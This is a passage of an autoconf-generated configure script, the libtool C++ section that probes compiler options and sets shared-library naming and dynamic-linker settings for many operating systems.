>&5 if (exit $ac_status) && test -s out/conftest2.$ac_objext then # The compiler can only warn and ignore the option if not recognized # So say no if there are warnings $ECHO "$_lt_compiler_boilerplate" | $SED '/^$/d' > out/conftest.exp $SED '/^$/d; /^ *+/d' out/conftest.err >out/conftest.er2 if test ! -s out/conftest.er2 || diff out/conftest.exp out/conftest.er2 >/dev/null; then lt_cv_prog_compiler_c_o_CXX=yes fi fi chmod u+w . 2>&5 $RM conftest* # SGI C++ compiler will create directory out/ii_files/ for # template instantiation test -d out/ii_files && $RM out/ii_files/* && rmdir out/ii_files $RM out/* && rmdir out cd .. $RM -r conftest $RM conftest* fi { $as_echo "$as_me:${as_lineno-$LINENO}: result: $lt_cv_prog_compiler_c_o_CXX" >&5 $as_echo "$lt_cv_prog_compiler_c_o_CXX" >&6; } { $as_echo "$as_me:${as_lineno-$LINENO}: checking if $compiler supports -c -o file.$ac_objext" >&5 $as_echo_n "checking if $compiler supports -c -o file.$ac_objext... " >&6; } if ${lt_cv_prog_compiler_c_o_CXX+:} false; then : $as_echo_n "(cached) " >&6 else lt_cv_prog_compiler_c_o_CXX=no $RM -r conftest 2>/dev/null mkdir conftest cd conftest mkdir out echo "$lt_simple_compile_test_code" > conftest.$ac_ext lt_compiler_flag="-o out/conftest2.$ac_objext" # Insert the option either (1) after the last *FLAGS variable, or # (2) before a word containing "conftest.", or (3) at the end. # Note that $ac_compile itself does not contain backslashes and begins # with a dollar sign (not a hyphen), so the echo should work correctly. lt_compile=`echo "$ac_compile" | $SED \ -e 's:.*FLAGS}\{0,1\} :&$lt_compiler_flag :; t' \ -e 's: [^ ]*conftest\.: $lt_compiler_flag&:; t' \ -e 's:$: $lt_compiler_flag:'` (eval echo "\"\$as_me:$LINENO: $lt_compile\"" >&5) (eval "$lt_compile" 2>out/conftest.err) ac_status=$? cat out/conftest.err >&5 echo "$as_me:$LINENO: \$? = $ac_status" >&5 if (exit $ac_status) && test -s out/conftest2.$ac_objext then # The compiler can only warn and ignore the option if not recognized # So say no if there are warnings $ECHO "$_lt_compiler_boilerplate" | $SED '/^$/d' > out/conftest.exp $SED '/^$/d; /^ *+/d' out/conftest.err >out/conftest.er2 if test ! -s out/conftest.er2 || diff out/conftest.exp out/conftest.er2 >/dev/null; then lt_cv_prog_compiler_c_o_CXX=yes fi fi chmod u+w . 2>&5 $RM conftest* # SGI C++ compiler will create directory out/ii_files/ for # template instantiation test -d out/ii_files && $RM out/ii_files/* && rmdir out/ii_files $RM out/* && rmdir out cd .. $RM -r conftest $RM conftest* fi { $as_echo "$as_me:${as_lineno-$LINENO}: result: $lt_cv_prog_compiler_c_o_CXX" >&5 $as_echo "$lt_cv_prog_compiler_c_o_CXX" >&6; } hard_links=nottested if test no = "$lt_cv_prog_compiler_c_o_CXX" && test no != "$need_locks"; then # do not overwrite the value of need_locks provided by the user { $as_echo "$as_me:${as_lineno-$LINENO}: checking if we can lock with hard links" >&5 $as_echo_n "checking if we can lock with hard links... " >&6; } hard_links=yes $RM conftest* ln conftest.a conftest.b 2>/dev/null && hard_links=no touch conftest.a ln conftest.a conftest.b 2>&5 || hard_links=no ln conftest.a conftest.b 2>/dev/null && hard_links=no { $as_echo "$as_me:${as_lineno-$LINENO}: result: $hard_links" >&5 $as_echo "$hard_links" >&6; } if test no = "$hard_links"; then { $as_echo "$as_me:${as_lineno-$LINENO}: WARNING: '$CC' does not support '-c -o', so 'make -j' may be unsafe" >&5 $as_echo "$as_me: WARNING: '$CC' does not support '-c -o', so 'make -j' may be unsafe" >&2;} need_locks=warn fi else need_locks=no fi { $as_echo "$as_me:${as_lineno-$LINENO}: checking whether the $compiler linker ($LD) supports shared libraries" >&5 $as_echo_n "checking whether the $compiler linker ($LD) supports shared libraries... " >&6; } export_symbols_cmds_CXX='$NM $libobjs $convenience | $global_symbol_pipe | $SED '\''s/.* //'\'' | sort | uniq > $export_symbols' exclude_expsyms_CXX='_GLOBAL_OFFSET_TABLE_|_GLOBAL__F[ID]_.*' case $host_os in aix[4-9]*) # If we're using GNU nm, then we don't want the "-C" option. # -C means demangle to GNU nm, but means don't demangle to AIX nm. # Without the "-l" option, or with the "-B" option, AIX nm treats # weak defined symbols like other global defined symbols, whereas # GNU nm marks them as "W". # While the 'weak' keyword is ignored in the Export File, we need # it in the Import File for the 'aix-soname' feature, so we have # to replace the "-B" option with "-P" for AIX nm. if $NM -V 2>&1 | $GREP 'GNU' > /dev/null; then export_symbols_cmds_CXX='$NM -Bpg $libobjs $convenience | awk '\''{ if (((\$ 2 == "T") || (\$ 2 == "D") || (\$ 2 == "B") || (\$ 2 == "W")) && (substr(\$ 3,1,1) != ".")) { if (\$ 2 == "W") { print \$ 3 " weak" } else { print \$ 3 } } }'\'' | sort -u > $export_symbols' else export_symbols_cmds_CXX='`func_echo_all $NM | $SED -e '\''s/B\([^B]*\)$/P\1/'\''` -PCpgl $libobjs $convenience | awk '\''{ if (((\$ 2 == "T") || (\$ 2 == "D") || (\$ 2 == "B") || (\$ 2 == "L") || (\$ 2 == "W") || (\$ 2 == "V") || (\$ 2 == "Z")) && (substr(\$ 1,1,1) != ".")) { if ((\$ 2 == "W") || (\$ 2 == "V") || (\$ 2 == "Z")) { print \$ 1 " weak" } else { print \$ 1 } } }'\'' | sort -u > $export_symbols' fi ;; pw32*) export_symbols_cmds_CXX=$ltdll_cmds ;; cygwin* | mingw* | cegcc*) case $cc_basename in cl* | icl*) exclude_expsyms_CXX='_NULL_IMPORT_DESCRIPTOR|_IMPORT_DESCRIPTOR_.*' ;; *) export_symbols_cmds_CXX='$NM $libobjs $convenience | $global_symbol_pipe | $SED -e '\''/^[BCDGRS][ ]/s/.*[ ]\([^ ]*\)/\1 DATA/;s/^.*[ ]__nm__\([^ ]*\)[ ][^ ]*/\1 DATA/;/^I[ ]/d;/^[AITW][ ]/s/.* //'\'' | sort | uniq > $export_symbols' exclude_expsyms_CXX='[_]+GLOBAL_OFFSET_TABLE_|[_]+GLOBAL__[FID]_.*|[_]+head_[A-Za-z0-9_]+_dll|[A-Za-z0-9_]+_dll_iname' ;; esac ;; *) export_symbols_cmds_CXX='$NM $libobjs $convenience | $global_symbol_pipe | $SED '\''s/.* //'\'' | sort | uniq > $export_symbols' ;; esac { $as_echo "$as_me:${as_lineno-$LINENO}: result: $ld_shlibs_CXX" >&5 $as_echo "$ld_shlibs_CXX" >&6; } test no = "$ld_shlibs_CXX" && can_build_shared=no with_gnu_ld_CXX=$with_gnu_ld # # Do we need to explicitly link libc? # case "x$archive_cmds_need_lc_CXX" in x|xyes) # Assume -lc should be added archive_cmds_need_lc_CXX=yes if test yes,yes = "$GCC,$enable_shared"; then case $archive_cmds_CXX in *'~'*) # FIXME: we may have to deal with multi-command sequences. ;; '$CC '*) # Test whether the compiler implicitly links with -lc since on some # systems, -lgcc has to come before -lc. If gcc already passes -lc # to ld, don't add -lc before -lgcc. { $as_echo "$as_me:${as_lineno-$LINENO}: checking whether -lc should be explicitly linked in" >&5 $as_echo_n "checking whether -lc should be explicitly linked in... " >&6; } if ${lt_cv_archive_cmds_need_lc_CXX+:} false; then : $as_echo_n "(cached) " >&6 else $RM conftest* echo "$lt_simple_compile_test_code" > conftest.$ac_ext if { { eval echo "\"\$as_me\":${as_lineno-$LINENO}: \"$ac_compile\""; } >&5 (eval $ac_compile) 2>&5 ac_status=$? $as_echo "$as_me:${as_lineno-$LINENO}: \$? = $ac_status" >&5 test $ac_status = 0; } 2>conftest.err; then soname=conftest lib=conftest libobjs=conftest.$ac_objext deplibs= wl=$lt_prog_compiler_wl_CXX pic_flag=$lt_prog_compiler_pic_CXX compiler_flags=-v linker_flags=-v verstring= output_objdir=. libname=conftest lt_save_allow_undefined_flag=$allow_undefined_flag_CXX allow_undefined_flag_CXX= if { { eval echo "\"\$as_me\":${as_lineno-$LINENO}: \"$archive_cmds_CXX 2\>\&1 \| $GREP \" -lc \" \>/dev/null 2\>\&1\""; } >&5 (eval $archive_cmds_CXX 2\>\&1 \| $GREP \" -lc \" \>/dev/null 2\>\&1) 2>&5 ac_status=$? $as_echo "$as_me:${as_lineno-$LINENO}: \$? = $ac_status" >&5 test $ac_status = 0; } then lt_cv_archive_cmds_need_lc_CXX=no else lt_cv_archive_cmds_need_lc_CXX=yes fi allow_undefined_flag_CXX=$lt_save_allow_undefined_flag else cat conftest.err 1>&5 fi $RM conftest* fi { $as_echo "$as_me:${as_lineno-$LINENO}: result: $lt_cv_archive_cmds_need_lc_CXX" >&5 $as_echo "$lt_cv_archive_cmds_need_lc_CXX" >&6; } archive_cmds_need_lc_CXX=$lt_cv_archive_cmds_need_lc_CXX ;; esac fi ;; esac { $as_echo "$as_me:${as_lineno-$LINENO}: checking dynamic linker characteristics" >&5 $as_echo_n "checking dynamic linker characteristics... " >&6; } library_names_spec= libname_spec='lib$name' soname_spec= shrext_cmds=.so postinstall_cmds= postuninstall_cmds= finish_cmds= finish_eval= shlibpath_var= shlibpath_overrides_runpath=unknown version_type=none dynamic_linker="$host_os ld.so" sys_lib_dlsearch_path_spec="/lib /usr/lib" need_lib_prefix=unknown hardcode_into_libs=no # when you set need_version to no, make sure it does not cause -set_version # flags to be left without arguments need_version=unknown case $host_os in aix3*) version_type=linux # correct to gnu/linux during the next big refactor library_names_spec='$libname$release$shared_ext$versuffix $libname.a' shlibpath_var=LIBPATH # AIX 3 has no versioning support, so we append a major version to the name. soname_spec='$libname$release$shared_ext$major' ;; aix[4-9]*) version_type=linux # correct to gnu/linux during the next big refactor need_lib_prefix=no need_version=no hardcode_into_libs=yes if test ia64 = "$host_cpu"; then # AIX 5 supports IA64 library_names_spec='$libname$release$shared_ext$major $libname$release$shared_ext$versuffix $libname$shared_ext' shlibpath_var=LD_LIBRARY_PATH else # With GCC up to 2.95.x, collect2 would create an import file # for dependence libraries. The import file would start with # the line '#! .'. This would cause the generated library to # depend on '.', always an invalid library. This was fixed in # development snapshots of GCC prior to 3.0. case $host_os in aix4 | aix4.[01] | aix4.[01].*) if { echo '#if __GNUC__ > 2 || (__GNUC__ == 2 && __GNUC_MINOR__ >= 97)' echo ' yes ' echo '#endif'; } | $CC -E - | $GREP yes > /dev/null; then : else can_build_shared=no fi ;; esac # Using Import Files as archive members, it is possible to support # filename-based versioning of shared library archives on AIX. While # this would work for both with and without runtime linking, it will # prevent static linking of such archives. So we do filename-based # shared library versioning with .so extension only, which is used # when both runtime linking and shared linking is enabled. # Unfortunately, runtime linking may impact performance, so we do # not want this to be the default eventually. Also, we use the # versioned .so libs for executables only if there is the -brtl # linker flag in LDFLAGS as well, or --with-aix-soname=svr4 only. # To allow for filename-based versioning support, we need to create # libNAME.so.V as an archive file, containing: # *) an Import File, referring to the versioned filename of the # archive as well as the shared archive member, telling the # bitwidth (32 or 64) of that shared object, and providing the # list of exported symbols of that shared object, eventually # decorated with the 'weak' keyword # *) the shared object with the F_LOADONLY flag set, to really avoid # it being seen by the linker. # At run time we better use the real file rather than another symlink, # but for link time we create the symlink libNAME.so -> libNAME.so.V case $with_aix_soname,$aix_use_runtimelinking in # AIX (on Power*) has no versioning support, so currently we cannot hardcode correct # soname into executable. Probably we can add versioning support to # collect2, so additional links can be useful in future. aix,yes) # traditional libtool dynamic_linker='AIX unversionable lib.so' # If using run time linking (on AIX 4.2 or later) use lib.so # instead of lib.a to let people know that these are not # typical AIX shared libraries. library_names_spec='$libname$release$shared_ext$versuffix $libname$release$shared_ext$major $libname$shared_ext' ;; aix,no) # traditional AIX only dynamic_linker='AIX lib.a(lib.so.V)' # We preserve .a as extension for shared libraries through AIX4.2 # and later when we are not doing run time linking. library_names_spec='$libname$release.a $libname.a' soname_spec='$libname$release$shared_ext$major' ;; svr4,*) # full svr4 only dynamic_linker="AIX lib.so.V($shared_archive_member_spec.o)" library_names_spec='$libname$release$shared_ext$major $libname$shared_ext' # We do not specify a path in Import Files, so LIBPATH fires. shlibpath_overrides_runpath=yes ;; *,yes) # both, prefer svr4 dynamic_linker="AIX lib.so.V($shared_archive_member_spec.o), lib.a(lib.so.V)" library_names_spec='$libname$release$shared_ext$major $libname$shared_ext' # unpreferred sharedlib libNAME.a needs extra handling postinstall_cmds='test -n "$linkname" || linkname="$realname"~func_stripname "" ".so" "$linkname"~$install_shared_prog "$dir/$func_stripname_result.$libext" "$destdir/$func_stripname_result.$libext"~test -z "$tstripme" || test -z "$striplib" || $striplib "$destdir/$func_stripname_result.$libext"' postuninstall_cmds='for n in $library_names $old_library; do :; done~func_stripname "" ".so" "$n"~test "$func_stripname_result" = "$n" || func_append rmfiles " $odir/$func_stripname_result.$libext"' # We do not specify a path in Import Files, so LIBPATH fires. shlibpath_overrides_runpath=yes ;; *,no) # both, prefer aix dynamic_linker="AIX lib.a(lib.so.V), lib.so.V($shared_archive_member_spec.o)" library_names_spec='$libname$release.a $libname.a' soname_spec='$libname$release$shared_ext$major' # unpreferred sharedlib libNAME.so.V and symlink libNAME.so need extra handling postinstall_cmds='test -z "$dlname" || $install_shared_prog $dir/$dlname $destdir/$dlname~test -z "$tstripme" || test -z "$striplib" || $striplib $destdir/$dlname~test -n "$linkname" || linkname=$realname~func_stripname "" ".a" "$linkname"~(cd "$destdir" && $LN_S -f $dlname $func_stripname_result.so)' postuninstall_cmds='test -z "$dlname" || func_append rmfiles " $odir/$dlname"~for n in $old_library $library_names; do :; done~func_stripname "" ".a" "$n"~func_append rmfiles " $odir/$func_stripname_result.so"' ;; esac shlibpath_var=LIBPATH fi ;; amigaos*) case $host_cpu in powerpc) # Since July 2007 AmigaOS4 officially supports .so libraries. # When compiling the executable, add -use-dynld -Lsobjs: to the compileline. library_names_spec='$libname$release$shared_ext$versuffix $libname$release$shared_ext$major $libname$shared_ext' ;; m68k) library_names_spec='$libname.ixlibrary $libname.a' # Create ${libname}_ixlibrary.a entries in /sys/libs. finish_eval='for lib in `ls $libdir/*.ixlibrary 2>/dev/null`; do libname=`func_echo_all "$lib" | $SED '\''s%^.*/\([^/]*\)\.ixlibrary$%\1%'\''`; $RM /sys/libs/${libname}_ixlibrary.a; $show "cd /sys/libs && $LN_S $lib ${libname}_ixlibrary.a"; cd /sys/libs && $LN_S $lib ${libname}_ixlibrary.a || exit 1; done' ;; esac ;; beos*) library_names_spec='$libname$shared_ext' dynamic_linker="$host_os ld.so" shlibpath_var=LIBRARY_PATH ;; bsdi[45]*) version_type=linux # correct to gnu/linux during the next big refactor need_version=no library_names_spec='$libname$release$shared_ext$versuffix $libname$release$shared_ext$major $libname$shared_ext' soname_spec='$libname$release$shared_ext$major' finish_cmds='PATH="\$PATH:/sbin" ldconfig $libdir' shlibpath_var=LD_LIBRARY_PATH sys_lib_search_path_spec="/shlib /usr/lib /usr/X11/lib /usr/contrib/lib /lib /usr/local/lib" sys_lib_dlsearch_path_spec="/shlib /usr/lib /usr/local/lib" # the default ld.so.conf also contains /usr/contrib/lib and # /usr/X11R6/lib (/usr/X11 is a link to /usr/X11R6), but let us allow # libtool to hard-code these into programs ;; cygwin* | mingw* | pw32* | cegcc*) version_type=windows shrext_cmds=.dll need_version=no need_lib_prefix=no case $GCC,$cc_basename in yes,*) # gcc library_names_spec='$libname.dll.a' # DLL is installed to $(libdir)/../bin by postinstall_cmds postinstall_cmds='base_file=`basename \$file`~ dlpath=`$SHELL 2>&1 -c '\''. $dir/'\''\$base_file'\''i; echo \$dlname'\''`~ dldir=$destdir/`dirname \$dlpath`~ test -d \$dldir || mkdir -p \$dldir~ $install_prog $dir/$dlname \$dldir/$dlname~ chmod a+x \$dldir/$dlname~ if test -n '\''$stripme'\'' && test -n '\''$striplib'\''; then eval '\''$striplib \$dldir/$dlname'\'' || exit \$?; fi' postuninstall_cmds='dldll=`$SHELL 2>&1 -c '\''. $file; echo \$dlname'\''`~ dlpath=$dir/\$dldll~ $RM \$dlpath' shlibpath_overrides_runpath=yes case $host_os in cygwin*) # Cygwin DLLs use 'cyg' prefix rather than 'lib' soname_spec='`echo $libname | sed -e 's/^lib/cyg/'``echo $release | $SED -e 's/[.]/-/g'`$versuffix$shared_ext' ;; mingw* | cegcc*) # MinGW DLLs use traditional 'lib' prefix soname_spec='$libname`echo $release | $SED -e 's/[.]/-/g'`$versuffix$shared_ext' ;; pw32*) # pw32 DLLs use 'pw' prefix rather than 'lib' library_names_spec='`echo $libname | sed -e 's/^lib/pw/'``echo $release | $SED -e 's/[.]/-/g'`$versuffix$shared_ext' ;; esac dynamic_linker='Win32 ld.exe' ;; *,cl* | *,icl*) # Native MSVC or ICC libname_spec='$name' soname_spec='$libname`echo $release | $SED -e 's/[.]/-/g'`$versuffix$shared_ext' library_names_spec='$libname.dll.lib' case $build_os in mingw*) sys_lib_search_path_spec= lt_save_ifs=$IFS IFS=';' for lt_path in $LIB do IFS=$lt_save_ifs # Let DOS variable expansion print the short 8.3 style file name. lt_path=`cd "$lt_path" 2>/dev/null && cmd //C "for %i in (".") do @echo %~si"` sys_lib_search_path_spec="$sys_lib_search_path_spec $lt_path" done IFS=$lt_save_ifs # Convert to MSYS style. sys_lib_search_path_spec=`$ECHO "$sys_lib_search_path_spec" | sed -e 's|\\\\|/|g' -e 's| \\([a-zA-Z]\\):| /\\1|g' -e 's|^ ||'` ;; cygwin*) # Convert to unix form, then to dos form, then back to unix form # but this time dos style (no spaces!) so that the unix form looks # like /cygdrive/c/PROGRA~1:/cygdr... sys_lib_search_path_spec=`cygpath --path --unix "$LIB"` sys_lib_search_path_spec=`cygpath --path --dos "$sys_lib_search_path_spec" 2>/dev/null` sys_lib_search_path_spec=`cygpath --path --unix "$sys_lib_search_path_spec" | $SED -e "s/$PATH_SEPARATOR/ /g"` ;; *) sys_lib_search_path_spec=$LIB if $ECHO "$sys_lib_search_path_spec" | $GREP ';[c-zC-Z]:/' >/dev/null; then # It is most probably a Windows format PATH. sys_lib_search_path_spec=`$ECHO "$sys_lib_search_path_spec" | $SED -e 's/;/ /g'` else sys_lib_search_path_spec=`$ECHO "$sys_lib_search_path_spec" | $SED -e "s/$PATH_SEPARATOR/ /g"` fi # FIXME: find the short name or the path components, as spaces are # common. (e.g. "Program Files" -> "PROGRA~1") ;; esac # DLL is installed to $(libdir)/../bin by postinstall_cmds postinstall_cmds='base_file=`basename \$file`~ dlpath=`$SHELL 2>&1 -c '\''. $dir/'\''\$base_file'\''i; echo \$dlname'\''`~ dldir=$destdir/`dirname \$dlpath`~ test -d \$dldir || mkdir -p \$dldir~ $install_prog $dir/$dlname \$dldir/$dlname' postuninstall_cmds='dldll=`$SHELL 2>&1 -c '\''. $file; echo \$dlname'\''`~ dlpath=$dir/\$dldll~ $RM \$dlpath' shlibpath_overrides_runpath=yes dynamic_linker='Win32 link.exe' ;; *) # Assume MSVC and ICC wrapper library_names_spec='$libname`echo $release | $SED -e 's/[.]/-/g'`$versuffix$shared_ext $libname.lib' dynamic_linker='Win32 ld.exe' ;; esac # FIXME: first we should search . and the directory the executable is in shlibpath_var=PATH ;; darwin* | rhapsody*) dynamic_linker="$host_os dyld" version_type=darwin need_lib_prefix=no need_version=no library_names_spec='$libname$release$major$shared_ext $libname$shared_ext' soname_spec='$libname$release$major$shared_ext' shlibpath_overrides_runpath=yes shlibpath_var=DYLD_LIBRARY_PATH shrext_cmds='`test .$module = .yes && echo .so || echo .dylib`' sys_lib_dlsearch_path_spec='/usr/local/lib /lib /usr/lib' ;; dgux*) version_type=linux # correct to gnu/linux during the next big refactor need_lib_prefix=no need_version=no library_names_spec='$libname$release$shared_ext$versuffix $libname$release$shared_ext$major $libname$shared_ext' soname_spec='$libname$release$shared_ext$major' shlibpath_var=LD_LIBRARY_PATH ;; freebsd* | dragonfly*) # DragonFly does not have aout. When/if they implement a new # versioning mechanism, adjust this. if test -x /usr/bin/objformat; then objformat=`/usr/bin/objformat` else case $host_os in freebsd[23].*) objformat=aout ;; *) objformat=elf ;; esac fi version_type=freebsd-$objformat case $version_type in freebsd-elf*) library_names_spec='$libname$release$shared_ext$versuffix $libname$release$shared_ext$major $libname$shared_ext' soname_spec='$libname$release$shared_ext$major' need_version=no need_lib_prefix=no ;; freebsd-*) library_names_spec='$libname$release$shared_ext$versuffix $libname$shared_ext$versuffix' need_version=yes ;; esac shlibpath_var=LD_LIBRARY_PATH case $host_os in freebsd2.*) shlibpath_overrides_runpath=yes ;; freebsd3.[01]* | freebsdelf3.[01]*) shlibpath_overrides_runpath=yes hardcode_into_libs=yes ;; freebsd3.[2-9]* | freebsdelf3.[2-9]* | \ freebsd4.[0-5] | freebsdelf4.[0-5] | freebsd4.1.1 | freebsdelf4.1.1) shlibpath_overrides_runpath=no hardcode_into_libs=yes ;; *) # from 4.6 on, and DragonFly shlibpath_overrides_runpath=yes hardcode_into_libs=yes ;; esac ;; haiku*) version_type=linux # correct to gnu/linux during the next big refactor need_lib_prefix=no need_version=no dynamic_linker="$host_os runtime_loader" library_names_spec='$libname$release$shared_ext$versuffix $libname$release$shared_ext$major $libname$shared_ext' soname_spec='$libname$release$shared_ext$major' shlibpath_var=LIBRARY_PATH shlibpath_overrides_runpath=no sys_lib_dlsearch_path_spec='/boot/home/config/lib /boot/common/lib /boot/system/lib' hardcode_into_libs=yes ;; hpux9* | hpux10* | hpux11*) # Give a soname corresponding to the major version so that dld.sl refuses to # link against other versions. version_type=sunos need_lib_prefix=no need_version=no case $host_cpu in ia64*) shrext_cmds='.so' hardcode_into_libs=yes dynamic_linker="$host_os dld.so" shlibpath_var=LD_LIBRARY_PATH shlibpath_overrides_runpath=yes # Unless +noenvvar is specified. library_names_spec='$libname$release$shared_ext$versuffix $libname$release$shared_ext$major $libname$shared_ext' soname_spec='$libname$release$shared_ext$major' if test 32 = "$HPUX_IA64_MODE"; then sys_lib_search_path_spec="/usr/lib/hpux32 /usr/local/lib/hpux32 /usr/local/lib" sys_lib_dlsearch_path_spec=/usr/lib/hpux32 else sys_lib_search_path_spec="/usr/lib/hpux64 /usr/local/lib/hpux64" sys_lib_dlsearch_path_spec=/usr/lib/hpux64 fi ;; hppa*64*) shrext_cmds='.sl' hardcode_into_libs=yes dynamic_linker="$host_os dld.sl" shlibpath_var=LD_LIBRARY_PATH # How should we handle SHLIB_PATH shlibpath_overrides_runpath=yes # Unless +noenvvar is specified. library_names_spec='$libname$release$shared_ext$versuffix $libname$release$shared_ext$major $libname$shared_ext' soname_spec='$libname$release$shared_ext$major' sys_lib_search_path_spec="/usr/lib/pa20_64 /usr/ccs/lib/pa20_64" sys_lib_dlsearch_path_spec=$sys_lib_search_path_spec ;; *) shrext_cmds='.sl' dynamic_linker="$host_os dld.sl" shlibpath_var=SHLIB_PATH shlibpath_overrides_runpath=no # +s is required to enable SHLIB_PATH library_names_spec='$libname$release$shared_ext$versuffix $libname$release$shared_ext$major $libname$shared_ext' soname_spec='$libname$release$shared_ext$major' ;; esac # HP-UX runs *really* slowly unless shared libraries are mode 555, ... postinstall_cmds='chmod 555 $lib' # or fails outright, so override atomically: install_override_mode=555 ;; interix[3-9]*) version_type=linux # correct to gnu/linux during the next big refactor need_lib_prefix=no need_version=no library_names_spec='$libname$release$shared_ext$versuffix $libname$release$shared_ext$major $libname$shared_ext' soname_spec='$libname$release$shared_ext$major' dynamic_linker='Interix 3.x ld.so.1 (PE, like ELF)' shlibpath_var=LD_LIBRARY_PATH shlibpath_overrides_runpath=no hardcode_into_libs=yes ;; irix5* | irix6* | nonstopux*) case $host_os in nonstopux*) version_type=nonstopux ;; *) if test yes = "$lt_cv_prog_gnu_ld"; then version_type=linux # correct to gnu/linux during the next big refactor else version_type=irix fi ;; esac need_lib_prefix=no need_version=no soname_spec='$libname$release$shared_ext$major' library_names_spec='$libname$release$shared_ext$versuffix $libname$release$shared_ext$major $libname$release$shared_ext $libname$shared_ext' case $host_os in irix5* | nonstopux*) libsuff= shlibsuff= ;; *) case $LD in # libtool.m4 will add one of these switches to LD *-32|*"-32 "|*-melf32bsmip|*"-melf32bsmip ") libsuff= shlibsuff= libmagic=32-bit;; *-n32|*"-n32 "|*-melf32bmipn32|*"-melf32bmipn32 ") libsuff=32 shlibsuff=N32 libmagic=N32;; *-64|*"-64 "|*-melf64bmip|*"-melf64bmip ") libsuff=64 shlibsuff=64 libmagic=64-bit;; *) libsuff= shlibsuff= libmagic=never-match;; esac ;; esac shlibpath_var=LD_LIBRARY${shlibsuff}_PATH shlibpath_overrides_runpath=no sys_lib_search_path_spec="/usr/lib$libsuff /lib$libsuff /usr/local/lib$libsuff" sys_lib_dlsearch_path_spec="/usr/lib$libsuff /lib$libsuff" hardcode_into_libs=yes ;; # No shared lib support for Linux oldld, aout, or coff. linux*oldld* | linux*aout* | linux*coff*) dynamic_linker=no ;; linux*android*) version_type=none # Android doesn't support versioned libraries. need_lib_prefix=no need_version=no library_names_spec='$libname$release$shared_ext' soname_spec='$libname$release$shared_ext' finish_cmds= shlibpath_var=LD_LIBRARY_PATH shlibpath_overrides_runpath=yes # This implies no fast_install, which is unacceptable. # Some rework will be needed to allow for fast_install # before this can be enabled. hardcode_into_libs=yes dynamic_linker='Android linker' # Don't embed -rpath directories since the linker doesn't support them. hardcode_libdir_flag_spec_CXX='-L$libdir' ;; # This must be glibc/ELF. linux* | k*bsd*-gnu | kopensolaris*-gnu | gnu*) version_type=linux # correct to gnu/linux during the next big refactor need_lib_prefix=no need_version=no library_names_spec='$libname$release$shared_ext$versuffix $libname$release$shared_ext$major $libname$shared_ext' soname_spec='$libname$release$shared_ext$major' finish_cmds='PATH="\$PATH:/sbin" ldconfig -n $libdir' shlibpath_var=LD_LIBRARY_PATH shlibpath_overrides_runpath=no # Some binutils ld are patched to set DT_RUNPATH if ${lt_cv_shlibpath_overrides_runpath+:} false; then : $as_echo_n "(cached) " >&6 else lt_cv_shlibpath_overrides_runpath=no save_LDFLAGS=$LDFLAGS save_libdir=$libdir eval "libdir=/foo; wl=\"$lt_prog_compiler_wl_CXX\"; \ LDFLAGS=\"\$LDFLAGS $hardcode_libdir_flag_spec_CXX\"" cat confdefs.h - <<_ACEOF >conftest.$ac_ext /* end confdefs.h. */ int main () { ; return 0; } _ACEOF if ac_fn_cxx_try_link "$LINENO"; then : if ($OBJDUMP -p conftest$ac_exeext) 2>/dev/null | grep "RUNPATH.*$libdir" >/dev/null; then : lt_cv_shlibpath_overrides_runpath=yes fi fi rm -f core conftest.err conftest.$ac_objext \ conftest$ac_exeext conftest.$ac_ext LDFLAGS=$save_LDFLAGS libdir=$save_libdir fi shlibpath_overrides_runpath=$lt_cv_shlibpath_overrides_runpath # This implies no fast_install, which is unacceptable. # Some rework will be needed to allow for fast_install # before this can be enabled. hardcode_into_libs=yes # Ideally, we could use ldconfig to report *all* directores which are # searched for libraries, however this is still not possible. Aside from not # being certain /sbin/ldconfig is available, command # 'ldconfig -N -X -v | grep ^/' on 64bit Fedora does not report /usr/lib64, # even though it is searched at run-time. Try to do the best guess by # appending ld.so.conf contents (and includes) to the search path. if test -f /etc/ld.so.conf; then lt_ld_extra=`awk '/^include / { system(sprintf("cd /etc; cat %s 2>/dev/null", \$2)); skip = 1; } { if (!skip) print \$0; skip = 0; }' < /etc/ld.so.conf | $SED -e 's/#.*//;/^[ ]*hwcap[ ]/d;s/[:, ]/ /g;s/=[^=]*$//;s/=[^= ]* / /g;s/"//g;/^$/d' | tr '\n' ' '` sys_lib_dlsearch_path_spec="/lib /usr/lib $lt_ld_extra" fi # We used to test for /lib/ld.so.1 and disable shared libraries on # powerpc, because MkLinux only supported shared libraries with the # GNU dynamic linker. Since this was broken with cross compilers, # most powerpc-linux boxes support dynamic linking these days and # people can always --disable-shared, the test was removed, and we # assume the GNU/Linux dynamic linker is in use. dynamic_linker='GNU/Linux ld.so' ;; netbsd*) version_type=sunos need_lib_prefix=no need_version=no if echo __ELF__ | $CC -E - | $GREP __ELF__ >/dev/null; then library_names_spec='$libname$release$shared_ext$versuffix $libname$shared_ext$versuffix' finish_cmds='PATH="\$PATH:/sbin" ldconfig -m $libdir' dynamic_linker='NetBSD (a.out) ld.so' else library_names_spec='$libname$release$shared_ext$versuffix $libname$release$shared_ext$major $libname$shared_ext' soname_spec='$libname$release$shared_ext$major' dynamic_linker='NetBSD ld.elf_so' fi shlibpath_var=LD_LIBRARY_PATH shlibpath_overrides_runpath=yes hardcode_into_libs=yes ;; newsos6) version_type=linux # correct to gnu/linux during the next big refactor library_names_spec='$libname$release$shared_ext$versuffix $libname$release$shared_ext$major $libname$shared_ext' shlibpath_var=LD_LIBRARY_PATH shlibpath_overrides_runpath=yes ;; *nto* | *qnx*) version_type=qnx need_lib_prefix=no need_version=no library_names_spec='$libname$release$shared_ext$versuffix $libname$release$shared_ext$major $libname$shared_ext' soname_spec='$libname$release$shared_ext$major' shlibpath_var=LD_LIBRARY_PATH shlibpath_overrides_runpath=no hardcode_into_libs=yes dynamic_linker='ldqnx.so' ;; openbsd* | bitrig*) version_type=sunos sys_lib_dlsearch_path_spec=/usr/lib need_lib_prefix=no if test -z "`echo __ELF__ | $CC -E - | $GREP __ELF__`"; then need_version=no else need_version=yes fi library_names_spec='$libname$release$shared_ext$versuffix $libname$shared_ext$versuffix' finish_cmds='PATH="\$PATH:/sbin" ldconfig -m $libdir' shlibpath_var=LD_LIBRARY_PATH shlibpath_overrides_runpath=yes ;; os2*) libname_spec='$name' version_type=windows shrext_cmds=.dll need_version=no need_lib_prefix=no # OS/2 can only load a DLL with a base name of 8 characters or less. soname_spec='`test -n "$os2dllname" && libname="$os2dllname"; v=$($ECHO $release$versuffix | tr -d .-); n=$($ECHO $libname | cut -b -$((8 - ${#v})) | tr . _); $ECHO $n$v`$shared_ext' library_names_spec='${libname}_dll.$libext' dynamic_linker='OS/2 ld.exe' shlibpath_var=BEGINLIBPATH sys_lib_search_path_spec="/lib /usr/lib /usr/local/lib" 